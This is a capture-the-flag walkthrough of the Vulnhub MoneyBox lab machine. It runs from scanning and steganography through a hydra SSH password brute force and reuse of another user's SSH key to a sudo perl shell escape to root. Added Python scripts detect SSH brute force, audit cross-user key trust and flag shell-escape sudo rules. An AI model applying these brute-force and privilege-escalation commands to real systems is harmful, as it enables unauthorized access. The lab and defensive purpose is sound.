MoneyBox Walkthrough – Vulnhub – Writeup

MoneyBox is an easy machine from Vulnhub. If you haven’t tried it yet, I suggest you do so before reading on.

Link to the machine: https://www.vulnhub.com/entry/moneybox-1,653/


From this machine, we can learn:

  1. Basic enumeration of HTTP
  2. Steganography using steghide
  3. Basics of SSH
  4. Abuse sudo to get root privilege escalation

Identify the target

First of all, I identified the IP address of the target machine.

sudo netdiscover -i eth0 -r 10.0.2.0/24

Scan open ports

Next, I scanned the open ports to identify the exposed services.

sudo nmap -v -T4 -A -p- -oN nmap.log 10.0.2.53

Here, we can see that we have anonymous FTP access. So, I logged into FTP.

Anonymous FTP access

lftp -u anonymous, 10.0.2.53

I downloaded the image to my local machine. Then, I tried extracting data from it with steghide without a passphrase, but it gave me nothing.

steghide extract -sf trytofind.jpg

I also tried brute-forcing the passphrase, but that didn’t give me anything either.

stegseek trytofind.jpg /home/kali/rockyou.txt

So, I would have to find the steganography passphrase somewhere else.

Enumerate the webserver

The default page doesn’t give anything.

When I brute-forced directories on the webserver, I found a path.

gobuster dir -u http://10.0.2.53 -x txt,php,html,bak --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o dir.log

Upon curling the path, I found a hint.

curl -L 10.0.2.53/blogs

The path had a comment that suggested I visit a new path.

curl -L 10.0.2.53/S3cr3t-T3xt

Here, we got the secret key that I could use as the steganography passphrase.

Steganography

Steganography is a way of hiding data inside other files. Since the image is a JPEG, a reasonable guess is that the data was embedded with steghide, which supports that format. Running steghide again, this time with the passphrase found on the webserver:

steghide extract -sf trytofind.jpg

It wrote a new file, “data.txt”, which had a hint about a username on the target.

cat data.txt
Hello.....  renu

      I tell you something Important.Your Password is too Week So Change Your Password
Don't Underestimate it.......

The file gives us the username “renu” and tells us that the password is weak. Therefore, we might want to brute-force the password.

Bruteforce

hydra -l renu -P /home/kali/rockyou.txt 10.0.2.53 ssh

We were able to crack the password. Hence, I logged in as renu and got the user flag.

ssh renu@10.0.2.53
ls -al
cat user1.txt
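To show the defender's side of the password brute-force above, here is an added example (my own code, not from the original post) that parses sshd messages from a Debian-style auth.log, counts failed logins per source address, flags sources that exceed a threshold, and reports any successful login that followed a run of failures, which is exactly the trace hydra leaves behind. The log lines are constructed for the example, and the threshold of 5 is an assumed tuning value.

```python
import re
from collections import defaultdict

# Constructed sample of Debian-style sshd messages from /var/log/auth.log;
# not captured from the machine.
SAMPLE_AUTH_LOG = """\
Mar  3 10:01:01 moneybox sshd[1201]: Failed password for renu from 10.0.2.15 port 40001 ssh2
Mar  3 10:01:02 moneybox sshd[1202]: Failed password for renu from 10.0.2.15 port 40002 ssh2
Mar  3 10:01:02 moneybox sshd[1203]: Failed password for invalid user admin from 10.0.2.15 port 40003 ssh2
Mar  3 10:01:03 moneybox sshd[1204]: Failed password for renu from 10.0.2.15 port 40004 ssh2
Mar  3 10:01:03 moneybox sshd[1205]: Failed password for renu from 10.0.2.15 port 40005 ssh2
Mar  3 10:01:04 moneybox sshd[1206]: Failed password for renu from 10.0.2.15 port 40006 ssh2
Mar  3 10:01:05 moneybox sshd[1207]: Accepted password for renu from 10.0.2.15 port 40007 ssh2
Mar  3 10:05:00 moneybox sshd[1300]: Failed password for lily from 10.0.2.20 port 50001 ssh2
Mar  3 10:09:00 moneybox sshd[1301]: Accepted publickey for lily from 10.0.2.53 port 50100 ssh2
"""

# "invalid user" is inserted by sshd when the account does not exist.
FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")
ACCEPTED_RE = re.compile(
    r"sshd\[\d+\]: Accepted (\w+) for (\S+) from (\S+) port \d+")


def summarize_ssh_auth(log_text):
    """Walk the log once and return three things:
    failures: {source_ip: failed_login_count}
    users_tried: {source_ip: sorted usernames attempted from that source}
    successes_after_failures: [(source_ip, user, method, prior_failures)] for
        accepted logins from a source that had already failed at least once,
        which is the signature of a brute force that eventually succeeded."""
    failures = defaultdict(int)
    users_tried = defaultdict(set)
    successes_after_failures = []
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            user, src = m.groups()
            failures[src] += 1
            users_tried[src].add(user)
            continue
        m = ACCEPTED_RE.search(line)
        if m:
            method, user, src = m.groups()
            prior = failures.get(src, 0)
            if prior > 0:
                successes_after_failures.append((src, user, method, prior))
    return (dict(failures),
            {src: sorted(users) for src, users in users_tried.items()},
            successes_after_failures)


def brute_force_sources(log_text, threshold=5):
    """Source addresses with at least `threshold` failed logins."""
    failures, _, _ = summarize_ssh_auth(log_text)
    return sorted(src for src, count in failures.items() if count >= threshold)


if __name__ == "__main__":
    failures, users, wins = summarize_ssh_auth(SAMPLE_AUTH_LOG)
    for src in brute_force_sources(SAMPLE_AUTH_LOG):
        print(f"brute force from {src}: {failures[src]} failures, users tried: {users[src]}")
    for src, user, method, prior in wins:
        print(f"ALERT: {src} logged in as {user} via {method} after {prior} failures")
```

On the sample, 10.0.2.15 is reported as a brute-force source and its eventual password login as renu is raised as an alert, while the single failure from 10.0.2.20 and lily's key-based login stay below the radar. The same logic is what fail2ban-style tooling applies before banning a source.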

Escalate to different user

When I listed the home directories, I found another user on the machine.

cd /home
ls -al

In lily’s home directory, there is an .ssh directory.

cd /home/lily
ls -al
cd .ssh
ls -al
cat authorized_keys

The .ssh directory has a file authorized_keys that contains the public SSH key of the user renu. This means that, using renu’s private key, we can log in as lily. There are two ways to do so. First, we can copy renu’s private key to our local machine and log in over SSH from there.

scp renu@10.0.2.53:~/.ssh/id_rsa .

The above command copies id_rsa along with its permissions into the current directory. This is cleaner than serving the key over an HTTP server. Now, we can log in with the key we just downloaded.

ssh lily@10.0.2.53 -i id_rsa

Alternatively, we can switch to lily from the target machine itself, using the key in renu’s home directory.

cd
ssh lily@localhost -i .ssh/id_rsa

From here, we can get the second user flag.

cat user2.txt
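The lateral movement above works because lily’s authorized_keys trusts a key that belongs to renu. The following added example (my own code, not from the post) audits that kind of cross-user key trust: it collects fingerprints from each user’s *.pub files and reports any authorized_keys entry that matches another user’s key. The sample home directories and key blobs are constructed (they decode as base64 but are not real keys), and load_homes() is a hypothetical helper for building the same mapping from a real /home.

```python
import base64
import hashlib
import os

KEY_TYPES = {"ssh-rsa", "ssh-ed25519", "ssh-dss",
             "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521"}


def parse_key_line(line):
    """Return (key_type, base64_blob, comment) from a .pub or authorized_keys line.
    authorized_keys entries may start with options such as command="..." or
    from="...", so we skip ahead to the first token that is a key type."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    fields = line.split()
    for i, token in enumerate(fields):
        if token in KEY_TYPES and i + 1 < len(fields):
            return token, fields[i + 1], " ".join(fields[i + 2:])
    return None


def fingerprint(blob_b64):
    """OpenSSH-style SHA256 fingerprint, the format `ssh-keygen -lf` prints."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def find_cross_user_keys(homes):
    """homes maps username -> {"pub": [lines], "authorized_keys": [lines]}.
    Returns (trusting_user, key_owner, fingerprint) for every authorized_keys
    entry that is some other user's own public key."""
    owners = {}
    for user, files in homes.items():
        for line in files.get("pub", []):
            parsed = parse_key_line(line)
            if parsed:
                owners.setdefault(fingerprint(parsed[1]), set()).add(user)
    findings = []
    for user, files in homes.items():
        for line in files.get("authorized_keys", []):
            parsed = parse_key_line(line)
            if not parsed:
                continue
            fp = fingerprint(parsed[1])
            for owner in sorted(owners.get(fp, ())):
                if owner != user:
                    findings.append((user, owner, fp))
    return findings


def load_homes(root="/home"):
    """Hypothetical helper (assumption: run as root so every ~/.ssh is readable)
    that builds the `homes` mapping from real home directories."""
    homes = {}
    with os.scandir(root) as entries:
        for entry in entries:
            ssh_dir = os.path.join(entry.path, ".ssh")
            if not entry.is_dir() or not os.path.isdir(ssh_dir):
                continue
            files = {"pub": [], "authorized_keys": []}
            try:
                for name in os.listdir(ssh_dir):
                    path = os.path.join(ssh_dir, name)
                    if name.endswith(".pub"):
                        with open(path) as fh:
                            files["pub"].extend(fh.read().splitlines())
                    elif name in ("authorized_keys", "authorized_keys2"):
                        with open(path) as fh:
                            files["authorized_keys"].extend(fh.read().splitlines())
            except PermissionError:
                continue
            homes[entry.name] = files
    return homes


def _fake_blob(label):
    # Constructed stand-in for a key blob: valid base64, but not a real key.
    return base64.b64encode(b"constructed-key-material:" + label.encode()).decode()


# Constructed sample mirroring the situation in the writeup: lily trusts renu's key.
SAMPLE_HOMES = {
    "renu": {"pub": [f"ssh-rsa {_fake_blob('renu')} renu@moneybox"],
             "authorized_keys": []},
    "lily": {"pub": [f"ssh-rsa {_fake_blob('lily')} lily@moneybox"],
             "authorized_keys": [f"ssh-rsa {_fake_blob('renu')} renu@moneybox",
                                 f"ssh-rsa {_fake_blob('lily')} lily@moneybox"]},
}

if __name__ == "__main__":
    for trusting, owner, fp in find_cross_user_keys(SAMPLE_HOMES):
        print(f"{trusting}'s authorized_keys accepts {owner}'s key {fp}")
```

Matching on fingerprints rather than raw text means a key that has been given a different comment, or prefixed with options, is still recognised as the same key. A single finding of the form lily trusts renu is the whole story of this section: whoever gets renu’s password also gets lily.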

Root privilege escalation

From lily, we can check the sudo permissions.

sudo -l

We can see that lily can run the perl command as any user via sudo. Since perl can execute arbitrary commands, this lets us run commands as root.

References: https://gtfobins.github.io/gtfobins/perl/#sudo

sudo perl -e 'exec "/bin/bash";'
cd
ls -al
cat .root.txt
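The sudoers rule that makes this escalation possible is exactly what a configuration audit should flag. As an added example that is not part of the original writeup, the script below parses sudoers-style text and reports rules that grant a non-root principal either ALL or a binary that GTFOBins documents as able to spawn a shell, even when the rule pins the arguments. The sample sudoers content is constructed (the real rule on the MoneyBox machine is not reproduced here), and the set of shell-escape binaries is a small selection from GTFOBins, not an exhaustive list.

```python
import os
import re

# Small selection of binaries that GTFOBins documents as able to spawn a shell
# when run under sudo; extend as needed, this is not an exhaustive list.
SHELL_ESCAPE_BINARIES = {"perl", "python", "python3", "ruby", "awk", "gawk", "find",
                         "vim", "vi", "less", "more", "env", "bash", "sh", "zsh"}

# user  host=(runas[:group]) [TAG:] cmd, cmd, ...
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<cmds>.+)$")
TAG_RE = re.compile(r"^(?:NOPASSWD|PASSWD|SETENV|NOSETENV|EXEC|NOEXEC|MAIL|NOMAIL|"
                    r"FOLLOW|NOFOLLOW|LOG_INPUT|NOLOG_INPUT|LOG_OUTPUT|NOLOG_OUTPUT):\s*")
SKIP_PREFIXES = ("Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias", "@include")

# Constructed sudoers sample; not the real file from the machine.
SAMPLE_SUDOERS = """\
Defaults        env_reset
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
lily    ALL=(ALL) NOPASSWD: /usr/bin/perl
backup  ALL=(root) NOPASSWD: /sbin/reboot, /usr/bin/less /var/log/syslog
"""


def parse_sudoers(text):
    """Parse user specifications into dicts with who/host/runas/tags/cmd.
    Aliases and #includedir are deliberately not expanded. A tag such as
    NOPASSWD carries over to the commands that follow it in the same rule."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        # "(ALL:ALL)" -> runas user ALL; a missing Runas_Spec means root.
        runas = (m.group("runas") or "root").split(":")[0].strip() or "root"
        tags = set()
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            while (t := TAG_RE.match(cmd)):
                tags.add(t.group(0).rstrip(": "))
                cmd = cmd[t.end():]
            rules.append({"who": m.group("who"), "host": m.group("host"),
                          "runas": runas, "tags": sorted(tags), "cmd": cmd})
    return rules


def audit_sudoers(text):
    """Return (who, runas, cmd, reason) for rules that hand out ALL or a
    shell-capable command. root's own rule is skipped: root has everything anyway."""
    findings = []
    for rule in parse_sudoers(text):
        if rule["who"] == "root":
            continue
        cmd = rule["cmd"]
        base = os.path.basename(cmd.split()[0]) if cmd else ""
        if cmd == "ALL":
            reason = "unrestricted command set"
        elif base in SHELL_ESCAPE_BINARIES:
            reason = f"{base} can spawn a shell even with fixed arguments (see GTFOBins)"
        else:
            continue
        if "NOPASSWD" in rule["tags"]:
            reason += ", no password required"
        findings.append((rule["who"], rule["runas"], cmd, reason))
    return findings


if __name__ == "__main__":
    for who, runas, cmd, reason in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{who} may run '{cmd}' as {runas}: {reason}")
```

On the sample, the lily/perl rule is reported with runas ALL, and so is backup’s `less /var/log/syslog`, because pinning the arguments of a pager does nothing to stop its `!` command; the reboot entry is left alone. The remediation side is the mirror image: grant a purpose-built script or a binary with no shell escape instead of an interpreter, and never as `(ALL)` when `(root)` is not even needed.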
